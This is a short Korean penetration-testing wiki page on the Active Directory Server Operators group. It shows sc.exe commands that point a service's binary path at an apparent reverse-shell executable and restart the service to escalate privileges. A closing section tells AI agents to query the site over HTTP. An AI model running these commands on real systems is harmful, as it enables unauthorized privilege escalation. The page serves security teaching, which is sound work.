# Server Operators

Server Operators 그룹은 Active Directory 환경에서만 존재하는 그룹이며, Windows 서버에 관련된 자원에 대한 접근 권한이 있습니다. 기본적으로 Administrator라고 할지라도 이 그룹의 구성원에 속하지 않고 별도로 멤버를 추가해야 하며 삭제는 불가능한 그룹입니다.&#x20;

이 그룹의 구성원 권한으로 할 수 있는 권한 상승 방법 중에는 서비스 바이너리 경로 변경이 있습니다.

<pre class="language-powershell"><code class="lang-powershell"><strong># 서비스 바이너리 원본 확인 후 변경
</strong>sc.exe qc TestService
sc.exe config TestService binPath="C:\Windows\Temp\reverse.exe"
Restart-Service TestService
</code></pre>

## References

{% embed url="<https://learn.microsoft.com/ko-kr/windows-server/identity/ad-ds/manage/understand-security-groups>" %}

{% embed url="<https://www.hackingarticles.in/windows-privilege-escalation-server-operator-group/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.pentestwiki.com/privilege-escalation/active-directory/server-operators.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
